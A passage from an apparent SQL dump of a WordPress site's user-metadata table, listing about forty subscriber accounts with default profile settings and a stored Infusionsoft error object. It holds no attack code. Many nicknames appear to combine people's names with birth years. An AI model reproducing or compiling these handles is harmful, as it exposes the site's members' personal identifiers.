(7145, 541, 'comment_shortcuts', 'false'),
(7146, 541, 'admin_color', 'fresh'),
(7147, 541, 'use_ssl', '0'),
(7148, 541, 'show_admin_bar_front', 'true'),
(7149, 541, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7150, 541, 'cyb_user_level', '0'),
(7151, 541, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7152, 541, 'default_password_nag', '1'),
(7153, 542, 'nickname', 'bennistern1956'),
(7154, 542, 'first_name', ''),
(7155, 542, 'last_name', ''),
(7156, 542, 'description', ''),
(7157, 542, 'rich_editing', 'true'),
(7158, 542, 'comment_shortcuts', 'false'),
(7159, 542, 'admin_color', 'fresh'),
(7160, 542, 'use_ssl', '0'),
(7161, 542, 'show_admin_bar_front', 'true'),
(7162, 542, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7163, 542, 'cyb_user_level', '0'),
(7164, 542, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7165, 542, 'default_password_nag', '1'),
(7166, 543, 'nickname', 'roderic.grant1977'),
(7167, 543, 'first_name', ''),
(7168, 543, 'last_name', ''),
(7169, 543, 'description', ''),
(7170, 543, 'rich_editing', 'true'),
(7171, 543, 'comment_shortcuts', 'false'),
(7172, 543, 'admin_color', 'fresh'),
(7173, 543, 'use_ssl', '0'),
(7174, 543, 'show_admin_bar_front', 'true'),
(7175, 543, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7176, 543, 'cyb_user_level', '0'),
(7177, 543, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7178, 543, 'default_password_nag', '1'),
(7179, 544, 'nickname', 'oliviajgodwin1977'),
(7180, 544, 'first_name', ''),
(7181, 544, 'last_name', ''),
(7182, 544, 'description', ''),
(7183, 544, 'rich_editing', 'true'),
(7184, 544, 'comment_shortcuts', 'false'),
(7185, 544, 'admin_color', 'fresh'),
(7186, 544, 'use_ssl', '0'),
(7187, 544, 'show_admin_bar_front', 'true'),
(7188, 544, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7189, 544, 'cyb_user_level', '0'),
(7190, 544, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7191, 544, 'default_password_nag', '1'),
(7192, 545, 'nickname', 'a7j14b1987'),
(7193, 545, 'first_name', ''),
(7194, 545, 'last_name', ''),
(7195, 545, 'description', ''),
(7196, 545, 'rich_editing', 'true'),
(7197, 545, 'comment_shortcuts', 'false'),
(7198, 545, 'admin_color', 'fresh'),
(7199, 545, 'use_ssl', '0'),
(7200, 545, 'show_admin_bar_front', 'true'),
(7201, 545, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7202, 545, 'cyb_user_level', '0'),
(7203, 545, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7204, 545, 'default_password_nag', '1'),
(7205, 546, 'nickname', 'minipinki261998'),
(7206, 546, 'first_name', ''),
(7207, 546, 'last_name', ''),
(7208, 546, 'description', ''),
(7209, 546, 'rich_editing', 'true'),
(7210, 546, 'comment_shortcuts', 'false'),
(7211, 546, 'admin_color', 'fresh'),
(7212, 546, 'use_ssl', '0'),
(7213, 546, 'show_admin_bar_front', 'true'),
(7214, 546, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7215, 546, 'cyb_user_level', '0'),
(7216, 546, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7217, 546, 'default_password_nag', '1'),
(7218, 547, 'nickname', 'joywalker151993'),
(7219, 547, 'first_name', ''),
(7220, 547, 'last_name', ''),
(7221, 547, 'description', ''),
(7222, 547, 'rich_editing', 'true'),
(7223, 547, 'comment_shortcuts', 'false'),
(7224, 547, 'admin_color', 'fresh'),
(7225, 547, 'use_ssl', '0'),
(7226, 547, 'show_admin_bar_front', 'true'),
(7227, 547, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7228, 547, 'cyb_user_level', '0'),
(7229, 547, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7230, 547, 'default_password_nag', '1'),
(7231, 548, 'nickname', 'briannedupuis1991'),
(7232, 548, 'first_name', ''),
(7233, 548, 'last_name', ''),
(7234, 548, 'description', ''),
(7235, 548, 'rich_editing', 'true'),
(7236, 548, 'comment_shortcuts', 'false'),
(7237, 548, 'admin_color', 'fresh'),
(7238, 548, 'use_ssl', '0'),
(7239, 548, 'show_admin_bar_front', 'true'),
(7240, 548, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7241, 548, 'cyb_user_level', '0'),
(7242, 548, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7243, 548, 'default_password_nag', '1'),
(7244, 549, 'nickname', 'dleigha691965'),
(7245, 549, 'first_name', ''),
(7246, 549, 'last_name', ''),
(7247, 549, 'description', ''),
(7248, 549, 'rich_editing', 'true'),
(7249, 549, 'comment_shortcuts', 'false'),
(7250, 549, 'admin_color', 'fresh'),
(7251, 549, 'use_ssl', '0'),
(7252, 549, 'show_admin_bar_front', 'true'),
(7253, 549, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7254, 549, 'cyb_user_level', '0'),
(7255, 549, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7256, 549, 'default_password_nag', '1'),
(7257, 550, 'nickname', 'kcarrollpincus1977'),
(7258, 550, 'first_name', ''),
(7259, 550, 'last_name', ''),
(7260, 550, 'description', ''),
(7261, 550, 'rich_editing', 'true'),
(7262, 550, 'comment_shortcuts', 'false'),
(7263, 550, 'admin_color', 'fresh'),
(7264, 550, 'use_ssl', '0'),
(7265, 550, 'show_admin_bar_front', 'true'),
(7266, 550, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7267, 550, 'cyb_user_level', '0'),
(7268, 550, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7269, 550, 'default_password_nag', '1'),
(7270, 551, 'nickname', 'rodneycobb172004'),
(7271, 551, 'first_name', ''),
(7272, 551, 'last_name', ''),
(7273, 551, 'description', ''),
(7274, 551, 'rich_editing', 'true'),
(7275, 551, 'comment_shortcuts', 'false'),
(7276, 551, 'admin_color', 'fresh'),
(7277, 551, 'use_ssl', '0'),
(7278, 551, 'show_admin_bar_front', 'true'),
(7279, 551, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7280, 551, 'cyb_user_level', '0'),
(7281, 551, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7282, 551, 'default_password_nag', '1'),
(7283, 552, 'nickname', 'binsardi1954'),
(7284, 552, 'first_name', ''),
(7285, 552, 'last_name', ''),
(7286, 552, 'description', ''),
(7287, 552, 'rich_editing', 'true'),
(7288, 552, 'comment_shortcuts', 'false'),
(7289, 552, 'admin_color', 'fresh'),
(7290, 552, 'use_ssl', '0'),
(7291, 552, 'show_admin_bar_front', 'true'),
(7292, 552, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7293, 552, 'cyb_user_level', '0'),
(7294, 552, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7295, 552, 'default_password_nag', '1'),
(7296, 553, 'nickname', 'cowgillbrandi2004'),
(7297, 553, 'first_name', ''),
(7298, 553, 'last_name', ''),
(7299, 553, 'description', ''),
(7300, 553, 'rich_editing', 'true'),
(7301, 553, 'comment_shortcuts', 'false'),
(7302, 553, 'admin_color', 'fresh'),
(7303, 553, 'use_ssl', '0'),
(7304, 553, 'show_admin_bar_front', 'true'),
(7305, 553, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7306, 553, 'cyb_user_level', '0'),
(7307, 553, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7308, 553, 'default_password_nag', '1'),
(7309, 554, 'nickname', 'cochepain1987'),
(7310, 554, 'first_name', ''),
(7311, 554, 'last_name', ''),
(7312, 554, 'description', ''),
(7313, 554, 'rich_editing', 'true'),
(7314, 554, 'comment_shortcuts', 'false'),
(7315, 554, 'admin_color', 'fresh'),
(7316, 554, 'use_ssl', '0'),
(7317, 554, 'show_admin_bar_front', 'true'),
(7318, 554, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7319, 554, 'cyb_user_level', '0'),
(7320, 554, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7321, 554, 'default_password_nag', '1'),
(7322, 555, 'nickname', 'ndewees1992'),
(7323, 555, 'first_name', ''),
(7324, 555, 'last_name', ''),
(7325, 555, 'description', ''),
(7326, 555, 'rich_editing', 'true'),
(7327, 555, 'comment_shortcuts', 'false'),
(7328, 555, 'admin_color', 'fresh'),
(7329, 555, 'use_ssl', '0'),
(7330, 555, 'show_admin_bar_front', 'true'),
(7331, 555, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7332, 555, 'cyb_user_level', '0'),
(7333, 555, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7334, 555, 'default_password_nag', '1'),
(7335, 556, 'nickname', 'stuart2000'),
(7336, 556, 'first_name', ''),
(7337, 556, 'last_name', ''),
(7338, 556, 'description', ''),
(7339, 556, 'rich_editing', 'true'),
(7340, 556, 'comment_shortcuts', 'false'),
(7341, 556, 'admin_color', 'fresh'),
(7342, 556, 'use_ssl', '0'),
(7343, 556, 'show_admin_bar_front', 'true'),
(7344, 556, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7345, 556, 'cyb_user_level', '0'),
(7346, 556, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7347, 556, 'default_password_nag', '1'),
(7348, 557, 'nickname', 'jaclyng451987'),
(7349, 557, 'first_name', ''),
(7350, 557, 'last_name', ''),
(7351, 557, 'description', ''),
(7352, 557, 'rich_editing', 'true'),
(7353, 557, 'comment_shortcuts', 'false'),
(7354, 557, 'admin_color', 'fresh'),
(7355, 557, 'use_ssl', '0'),
(7356, 557, 'show_admin_bar_front', 'true'),
(7357, 557, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7358, 557, 'cyb_user_level', '0'),
(7359, 557, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7360, 557, 'default_password_nag', '1'),
(7361, 558, 'nickname', 'damarglobal1991'),
(7362, 558, 'first_name', ''),
(7363, 558, 'last_name', ''),
(7364, 558, 'description', ''),
(7365, 558, 'rich_editing', 'true'),
(7366, 558, 'comment_shortcuts', 'false'),
(7367, 558, 'admin_color', 'fresh'),
(7368, 558, 'use_ssl', '0'),
(7369, 558, 'show_admin_bar_front', 'true'),
(7370, 558, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7371, 558, 'cyb_user_level', '0'),
(7372, 558, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7373, 558, 'default_password_nag', '1'),
(7374, 559, 'nickname', 'colettepatnaude1999'),
(7375, 559, 'first_name', ''),
(7376, 559, 'last_name', ''),
(7377, 559, 'description', ''),
(7378, 559, 'rich_editing', 'true'),
(7379, 559, 'comment_shortcuts', 'false'),
(7380, 559, 'admin_color', 'fresh'),
(7381, 559, 'use_ssl', '0'),
(7382, 559, 'show_admin_bar_front', 'true'),
(7383, 559, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7384, 559, 'cyb_user_level', '0'),
(7385, 559, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7386, 559, 'default_password_nag', '1'),
(7387, 560, 'nickname', 'mhansemann1987'),
(7388, 560, 'first_name', ''),
(7389, 560, 'last_name', ''),
(7390, 560, 'description', ''),
(7391, 560, 'rich_editing', 'true'),
(7392, 560, 'comment_shortcuts', 'false'),
(7393, 560, 'admin_color', 'fresh'),
(7394, 560, 'use_ssl', '0'),
(7395, 560, 'show_admin_bar_front', 'true'),
(7396, 560, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7397, 560, 'cyb_user_level', '0'),
(7398, 560, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7399, 560, 'default_password_nag', '1'),
(7400, 561, 'nickname', 'gino1982'),
(7401, 561, 'first_name', ''),
(7402, 561, 'last_name', ''),
(7403, 561, 'description', ''),
(7404, 561, 'rich_editing', 'true'),
(7405, 561, 'comment_shortcuts', 'false'),
(7406, 561, 'admin_color', 'fresh'),
(7407, 561, 'use_ssl', '0'),
(7408, 561, 'show_admin_bar_front', 'true'),
(7409, 561, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7410, 561, 'cyb_user_level', '0'),
(7411, 561, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7412, 561, 'default_password_nag', '1'),
(7413, 562, 'nickname', 'tawambeke1988'),
(7414, 562, 'first_name', ''),
(7415, 562, 'last_name', ''),
(7416, 562, 'description', ''),
(7417, 562, 'rich_editing', 'true'),
(7418, 562, 'comment_shortcuts', 'false'),
(7419, 562, 'admin_color', 'fresh'),
(7420, 562, 'use_ssl', '0'),
(7421, 562, 'show_admin_bar_front', 'true'),
(7422, 562, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7423, 562, 'cyb_user_level', '0'),
(7424, 562, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7425, 562, 'default_password_nag', '1'),
(7426, 563, 'nickname', 'cody_skelton2002'),
(7427, 563, 'first_name', ''),
(7428, 563, 'last_name', ''),
(7429, 563, 'description', ''),
(7430, 563, 'rich_editing', 'true'),
(7431, 563, 'comment_shortcuts', 'false'),
(7432, 563, 'admin_color', 'fresh'),
(7433, 563, 'use_ssl', '0'),
(7434, 563, 'show_admin_bar_front', 'true'),
(7435, 563, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7436, 563, 'cyb_user_level', '0'),
(7437, 563, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7438, 563, 'default_password_nag', '1'),
(7439, 564, 'nickname', 'benbarfett1990'),
(7440, 564, 'first_name', ''),
(7441, 564, 'last_name', ''),
(7442, 564, 'description', ''),
(7443, 564, 'rich_editing', 'true'),
(7444, 564, 'comment_shortcuts', 'false'),
(7445, 564, 'admin_color', 'fresh'),
(7446, 564, 'use_ssl', '0'),
(7447, 564, 'show_admin_bar_front', 'true'),
(7448, 564, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7449, 564, 'cyb_user_level', '0'),
(7450, 564, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7451, 564, 'default_password_nag', '1'),
(7452, 565, 'nickname', 'skuzminskiy2006'),
(7453, 565, 'first_name', ''),
(7454, 565, 'last_name', ''),
(7455, 565, 'description', ''),
(7456, 565, 'rich_editing', 'true'),
(7457, 565, 'comment_shortcuts', 'false'),
(7458, 565, 'admin_color', 'fresh'),
(7459, 565, 'use_ssl', '0'),
(7460, 565, 'show_admin_bar_front', 'true'),
(7461, 565, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7462, 565, 'cyb_user_level', '0'),
(7463, 565, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7464, 565, 'default_password_nag', '1'),
(7465, 566, 'nickname', 'calebgibson1976'),
(7466, 566, 'first_name', ''),
(7467, 566, 'last_name', ''),
(7468, 566, 'description', ''),
(7469, 566, 'rich_editing', 'true'),
(7470, 566, 'comment_shortcuts', 'false'),
(7471, 566, 'admin_color', 'fresh'),
(7472, 566, 'use_ssl', '0'),
(7473, 566, 'show_admin_bar_front', 'true'),
(7474, 566, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7475, 566, 'cyb_user_level', '0'),
(7476, 566, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7477, 566, 'default_password_nag', '1'),
(7478, 567, 'nickname', 'vishal10131978'),
(7479, 567, 'first_name', ''),
(7480, 567, 'last_name', ''),
(7481, 567, 'description', ''),
(7482, 567, 'rich_editing', 'true'),
(7483, 567, 'comment_shortcuts', 'false'),
(7484, 567, 'admin_color', 'fresh'),
(7485, 567, 'use_ssl', '0'),
(7486, 567, 'show_admin_bar_front', 'true'),
(7487, 567, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7488, 567, 'cyb_user_level', '0'),
(7489, 567, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7490, 567, 'default_password_nag', '1'),
(7491, 568, 'nickname', 'teach_1st2002'),
(7492, 568, 'first_name', ''),
(7493, 568, 'last_name', ''),
(7494, 568, 'description', ''),
(7495, 568, 'rich_editing', 'true'),
(7496, 568, 'comment_shortcuts', 'false'),
(7497, 568, 'admin_color', 'fresh'),
(7498, 568, 'use_ssl', '0'),
(7499, 568, 'show_admin_bar_front', 'true'),
(7500, 568, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7501, 568, 'cyb_user_level', '0'),
(7502, 568, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7503, 568, 'default_password_nag', '1'),
(7504, 569, 'nickname', 'hcnosey1971'),
(7505, 569, 'first_name', ''),
(7506, 569, 'last_name', ''),
(7507, 569, 'description', ''),
(7508, 569, 'rich_editing', 'true'),
(7509, 569, 'comment_shortcuts', 'false'),
(7510, 569, 'admin_color', 'fresh'),
(7511, 569, 'use_ssl', '0'),
(7512, 569, 'show_admin_bar_front', 'true'),
(7513, 569, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7514, 569, 'cyb_user_level', '0'),
(7515, 569, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7516, 569, 'default_password_nag', '1'),
(7517, 570, 'nickname', 'lgarcia1987'),
(7518, 570, 'first_name', ''),
(7519, 570, 'last_name', ''),
(7520, 570, 'description', ''),
(7521, 570, 'rich_editing', 'true'),
(7522, 570, 'comment_shortcuts', 'false'),
(7523, 570, 'admin_color', 'fresh'),
(7524, 570, 'use_ssl', '0'),
(7525, 570, 'show_admin_bar_front', 'true'),
(7526, 570, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7527, 570, 'cyb_user_level', '0'),
(7528, 570, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7529, 570, 'default_password_nag', '1'),
(7530, 571, 'nickname', 'boddhibutterfly1994'),
(7531, 571, 'first_name', ''),
(7532, 571, 'last_name', ''),
(7533, 571, 'description', ''),
(7534, 571, 'rich_editing', 'true'),
(7535, 571, 'comment_shortcuts', 'false'),
(7536, 571, 'admin_color', 'fresh'),
(7537, 571, 'use_ssl', '0'),
(7538, 571, 'show_admin_bar_front', 'true'),
(7539, 571, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7540, 571, 'cyb_user_level', '0'),
(7541, 571, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7542, 571, 'default_password_nag', '1'),
(7543, 572, 'nickname', 'joshuaelu1992'),
(7544, 572, 'first_name', ''),
(7545, 572, 'last_name', ''),
(7546, 572, 'description', ''),
(7547, 572, 'rich_editing', 'true'),
(7548, 572, 'comment_shortcuts', 'false'),
(7549, 572, 'admin_color', 'fresh'),
(7550, 572, 'use_ssl', '0'),
(7551, 572, 'show_admin_bar_front', 'true'),
(7552, 572, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7553, 572, 'cyb_user_level', '0'),
(7554, 572, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7555, 572, 'default_password_nag', '1'),
(7556, 573, 'nickname', 'jgreen1977'),
(7557, 573, 'first_name', ''),
(7558, 573, 'last_name', ''),
(7559, 573, 'description', ''),
(7560, 573, 'rich_editing', 'true'),
(7561, 573, 'comment_shortcuts', 'false'),
(7562, 573, 'admin_color', 'fresh'),
(7563, 573, 'use_ssl', '0'),
(7564, 573, 'show_admin_bar_front', 'true'),
(7565, 573, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7566, 573, 'cyb_user_level', '0'),
(7567, 573, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7568, 573, 'default_password_nag', '1'),
(7569, 574, 'nickname', 'valeriedarcisse1973'),
(7570, 574, 'first_name', ''),
(7571, 574, 'last_name', ''),
(7572, 574, 'description', ''),
(7573, 574, 'rich_editing', 'true'),
(7574, 574, 'comment_shortcuts', 'false'),
(7575, 574, 'admin_color', 'fresh'),
(7576, 574, 'use_ssl', '0'),
(7577, 574, 'show_admin_bar_front', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(7578, 574, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7579, 574, 'cyb_user_level', '0'),
(7580, 574, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7581, 574, 'default_password_nag', '1'),
(7582, 575, 'nickname', 'dsteinhouse2004'),
(7583, 575, 'first_name', ''),
(7584, 575, 'last_name', ''),
(7585, 575, 'description', ''),
(7586, 575, 'rich_editing', 'true'),
(7587, 575, 'comment_shortcuts', 'false'),
(7588, 575, 'admin_color', 'fresh'),
(7589, 575, 'use_ssl', '0'),
(7590, 575, 'show_admin_bar_front', 'true'),
(7591, 575, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7592, 575, 'cyb_user_level', '0'),
(7593, 575, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7594, 575, 'default_password_nag', '1'),
(7595, 576, 'nickname', 'blondeygurl03261964'),
(7596, 576, 'first_name', ''),
(7597, 576, 'last_name', ''),
(7598, 576, 'description', ''),
(7599, 576, 'rich_editing', 'true'),
(7600, 576, 'comment_shortcuts', 'false'),
(7601, 576, 'admin_color', 'fresh'),
(7602, 576, 'use_ssl', '0'),
(7603, 576, 'show_admin_bar_front', 'true'),
(7604, 576, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7605, 576, 'cyb_user_level', '0'),
(7606, 576, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7607, 576, 'default_password_nag', '1'),
(7608, 577, 'nickname', 'ydesantos1999'),
(7609, 577, 'first_name', ''),
(7610, 577, 'last_name', ''),
(7611, 577, 'description', ''),
(7612, 577, 'rich_editing', 'true'),
(7613, 577, 'comment_shortcuts', 'false'),
(7614, 577, 'admin_color', 'fresh'),
(7615, 577, 'use_ssl', '0'),
(7616, 577, 'show_admin_bar_front', 'true'),
(7617, 577, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7618, 577, 'cyb_user_level', '0'),
(7619, 577, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7620, 577, 'default_password_nag', '1'),
(7621, 578, 'nickname', 'cwhitehead56002009'),
(7622, 578, 'first_name', ''),
(7623, 578, 'last_name', ''),
(7624, 578, 'description', ''),
(7625, 578, 'rich_editing', 'true'),
(7626, 578, 'comment_shortcuts', 'false'),
(7627, 578, 'admin_color', 'fresh'),
(7628, 578, 'use_ssl', '0'),
(7629, 578, 'show_admin_bar_front', 'true'),
(7630, 578, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7631, 578, 'cyb_user_level', '0'),
(7632, 578, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7633, 578, 'default_password_nag', '1'),
(7634, 579, 'nickname', 'abuse1994'),
(7635, 579, 'first_name', ''),
(7636, 579, 'last_name', ''),
(7637, 579, 'description', ''),
(7638, 579, 'rich_editing', 'true'),
(7639, 579, 'comment_shortcuts', 'false'),
(7640, 579, 'admin_color', 'fresh'),
(7641, 579, 'use_ssl', '0'),
(7642, 579, 'show_admin_bar_front', 'true'),
(7643, 579, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(7644, 579, 'cyb_user_level', '0'),
(7645, 579, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(7646, 579, 'default_password_nag', '1'),
(7647, 580, 'nickname', 'f.g.j1951'),
(7648, 580, 'first_name', ''),
(7649, 580, 'last_name', ''),
(7650, 580, 'description', ''),
